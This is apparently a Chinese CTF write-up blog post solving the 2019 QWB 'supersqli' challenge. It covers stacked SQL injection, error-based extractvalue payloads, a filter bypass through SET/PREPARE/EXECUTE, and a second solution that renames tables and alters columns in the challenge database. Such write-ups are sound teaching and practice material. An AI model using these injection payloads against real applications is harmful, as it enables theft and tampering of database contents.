堆叠注入、预定义sql语句的知识及例题

ctf sql

Word count: 303Reading time: 1 min

 2020/08/14   Share

2019-强网杯supersqli

随便输入一下发现select等关键词被过滤

尝试绕过关键词，%0a、<\a>、十六进制，内联注释都不行

解法一

前置知识：堆叠注入

显示列信息

show columns from table_name
desc table_name
select * from information_schema.columns where table_schema="" and table_name=""

使用;分隔命令，从而执行多个命令

payload:爆数据库

1	1'//and//extractvalue(1,concat(0x7e,database()))%23

payload:看表名

1	1';use//supersqli;show//tables%23

payload: 看1919810931114514内的字段

1	1';use//supersqli;show//columns//from//`1919810931114514`%23

payload:看flag

1	1';use//supersqli;SET//@sql=concat('s','elect//`flag`//from//`1919810931114514`');PREPARE//PRE//from//@sql;execute/**/PRE;%23

知识：

SET/**/@sql=concat('s','elect/**/`flag`/**/from/**/`1919810931114514`');   #设置变量

PREPARE/**/PRE/**/from/**/@sql;  #预定义SQL语句

EXECUTE PRE;  #执行预定义SQL语句

解法二

由于数据库默认从words数据库中获取，所以可以更改数据库名字从含flag的数据库里面取数据

1	http://159.138.137.79:53698/?inject=1' or 1=1; rename tables words to words1;rename tables `1919810931114514` to words;alter table words change flag id varchar(100);

更改表的名字
RENAME TABLE tbl_name TO new_tbl_name[, tbl_name2 TO new_tbl_name2,...]
alter table table_name to new name

更改字段的名字

alter table t_app change name app_name varchar(20) not null;

Author：HacKerQWQ

原文链接：https://hackerqwq.github.io/2020/08/14/2019-%E5%BC%BA%E7%BD%91%E6%9D%AF-suersqli/

发表日期：August 14th 2020, 9:19:49 pm

更新日期：April 18th 2021, 12:28:34 am

Next Post

[转载]CSP总结及CTF实例分析
Previous Post

md5碰撞脚本及shtml在BDJCTF的例题

CATALOG

1. 2019-强网杯supersqli
1. 1.1. 解法一
2. 1.2. 解法二



缺失模块。
1、请确保node版本大于6.2
2、在博客根目录（注意不是archer根目录）执行以下命令：
npm i hexo-generator-json-content --save
3、在根目录_config.yml里添加配置：

jsonContent:
  meta: false
  pages: false
  posts:
    title: true
    date: true
    path: true
    text: false
    raw: false
    content: false
    slug: false
    updated: false
    comments: false
    link: false
    permalink: false
    excerpt: false
    categories: true
    tags: true